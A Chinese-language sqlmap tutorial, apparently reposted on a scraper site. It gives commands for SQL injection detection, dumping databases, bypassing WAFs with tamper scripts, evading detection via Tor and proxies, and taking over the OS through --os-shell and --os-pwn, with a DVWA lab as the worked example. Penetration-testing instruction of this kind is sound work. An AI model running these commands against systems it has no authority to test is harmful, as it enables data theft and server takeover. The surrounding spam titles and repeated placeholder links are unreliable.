当前位置: 首页 > wzjs >正文

旅行社网站模板中国水电建设招标网站

旅行社网站模板,中国水电建设招标网站,上海关键词排名优化怎样,做ppt的背景图片网站目录 简介 一、安装与基础配置 1. 安装方法 2. 基本语法 二、基础扫描技术 1. 简单检测 2. 指定参数扫描 3. 批量扫描 三、信息收集 1. 获取数据库信息 2. 获取当前数据库 3. 获取数据库用户 4. 获取数据库版本 四、数据提取技术 1. 列出所有表 2. 提取表数据 …

目录

简介

一、安装与基础配置

1. 安装方法

2. 基本语法

二、基础扫描技术

1. 简单检测

2. 指定参数扫描

3. 批量扫描

三、信息收集

1. 获取数据库信息

2. 获取当前数据库

3. 获取数据库用户

4. 获取数据库版本

四、数据提取技术

1. 列出所有表

2. 提取表数据

3. 提取特定列

五、高级注入技术

1. 指定注入技术

2. 多线程扫描

3. 绕过WAF

六、实战案例演示

案例1:DVWA Low级别注入

案例2:POST请求注入

案例3:从文件读取请求

七、防御规避技巧

1. 延迟设置

2. 随机代理

3. 使用Tor网络

八、输出与报告

1. 保存结果到文件

2. 生成HTML报告

九、风险控制

1. 安全扫描模式

2. 测试级别

十、实用小技巧

简介

SQLMap是一款自动化 SQL 注入工具,能够检测和利用 SQL 注入漏洞。以下是全面的使用指南,包含基础命令、高级技巧和实战案例。

一、安装与基础配置

1. 安装方法

Kali Linux

sudo apt update && sudo apt install sqlmap

其他Linux系统

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap

Windows

  • 下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master

2. 基本语法

sqlmap.py -h

二、基础扫描技术

1. 简单检测

sqlmap.py -u "http://example.com/page.php?id=1"

2. 指定参数扫描

sqlmap.py -u "http://example.com/page.php?id=1" -p "id"

3. 批量扫描

sqlmap.py -m urls.txt  # urls.txt中包含多个目标URL

三、信息收集

1. 获取数据库信息

sqlmap.py -u "http://example.com/page.php?id=1" --dbs

2. 获取当前数据库

sqlmap.py -u "http://example.com/page.php?id=1" --current-db

3. 获取数据库用户

sqlmap.py -u "http://example.com/page.php?id=1" --current-user

4. 获取数据库版本

sqlmap.py -u "http://example.com/page.php?id=1" --banner

四、数据提取技术

1. 列出所有表

sqlmap.py -u "http://example.com/page.php?id=1" -D database_name --tables

2. 提取表数据

sqlmap.py -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump

3. 提取特定列

sqlmap.py -u "http://example.com/page.php?id=1" -D database_name -T table_name -C "column1,column2" --dump

五、高级注入技术

1. 指定注入技术

sqlmap.py -u "http://example.com/page.php?id=1" --technique=B  # 布尔盲注
sqlmap.py -u "http://example.com/page.php?id=1" --technique=T  # 时间盲注
sqlmap.py -u "http://example.com/page.php?id=1" --technique=E  # 报错注入

2. 多线程扫描

sqlmap.py -u "http://example.com/page.php?id=1" --threads=5

3. 绕过WAF

sqlmap.py -u "http://example.com/page.php?id=1" --tamper="space2comment"

常用tamper脚本:

  • space2comment:空格替换为注释

  • between:用BETWEEN替换大于号

  • randomcase:随机大小写

  • charunicodeencode:字符编码转换

六、实战案例演示

案例1:DVWA Low级别注入

sqlmap.py -u "http://192.168.21.4/DVWA/vulnerabilities/sqli/?id=1" --batch --dbs

案例2:POST请求注入

sqlmap.py -u "http://192.168.21.4/DVWA/vulnerabilities/sqli/?id=1  --data="id=1&Submit=Submit" --method POST

案例3:从文件读取请求

sqlmap.py -r request.txt  # request.txt保存了Burp拦截的请求

七、防御规避技巧

1. 延迟设置

sqlmap.py -u "http://example.com/page.php?id=1" --delay=2  # 2秒延迟

2. 随机代理

sqlmap.py -u "http://example.com/page.php?id=1" --proxy="http://proxy:port"

3. 使用Tor网络

sqlmap.py -u "http://example.com/page.php?id=1" --tor --tor-type=SOCKS5

八、输出与报告

1. 保存结果到文件

sqlmap.py -u "http://example.com/page.php?id=1" --output-dir=/path/to/results

2. 生成HTML报告

sqlmap.py -u "http://example.com/page.php?id=1" --dump --output-dir=report --format=HTML

九、风险控制

1. 安全扫描模式

sqlmap.py -u "http://example.com/page.php?id=1" --risk=1  # 低风险

2. 测试级别

sqlmap.py -u "http://example.com/page.php?id=1" --level=3  # 1-5,默认1

十、实用小技巧

  1. 获取操作系统shell

sqlmap.py -u "http://example.com/page.php?id=1" --os-shell
  1. 获取反向连接

sqlmap.py -u "http://example.com/page.php?id=1" --os-pwn
  1. 暴力破解表名

sqlmap.py -u "http://example.com/page.php?id=1" --common-tables

4.获取sql shell

sqlmap.py -u "http://example.com/page.php?id=1" --sql-shell

文章转载自:

http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://00000000.zdwjg.cn
http://www.dtcms.com/wzjs/618178.html

相关文章:

  • 网站 技术支持中国银行全球门户网站
  • 泰安最好的网站建设公司被公司优化掉是什么意思
  • 欧洲男女做受视频网站网站建设方案书内容管理制度
  • 构建网站的步骤哪个做网站的公司好
  • 高端网站建设哪些好媒体公司网站模板
  • 广东建设执业资格中心网站管理部门网站建设说明
  • 建立网站赚钱吗网站接入变更
  • php网站开发报告书中国万网的网址是什么
  • 网站建设流程知乎软件定制开发订单
  • 长沙模板网站建设企业做网站口碑比较好的大公司
  • 旅游企业网站开发随州哪里学做网站
  • 创建全国文明城市的目的搜索引擎优化简历
  • 毫州网站建设wordpress页面缓存
  • h5响应式网站公司郑州互联网seo使用教程
  • 新手学做网站看什么书公司网页制作教程
  • 白熊阅读做网站架构国外设计网站欣赏
  • 杭州定制网站制作wordpress 3d云标签
  • 网站快速上排名方法网站建设 东道网络
  • 网站建设教程 项目式wordpress按钮代码
  • 个人备案网站可以做商城吗上海关键词排名推广
  • 为女人网上量体做衣网站wordpress 分类目录里
  • 郑州发布最新通告php 优化网站建设
  • 石碣镇网站建设公司建筑模板规格尺寸
  • 外贸网站源码带支付新公司做网站有效果吗
  • 苏州做网站0512jinyan学了dw 就可以做网站了吗
  • 正能量网站下载平台开发软件
  • 淘宝网店怎么运营起来seo点击排名源码
  • 软件网站开发甘肃建设新北川网站
  • 汽修行业做环评网站公开课网站建设
  • 东南亚购物网站排名为什么中国人都跑去泰国做网站网站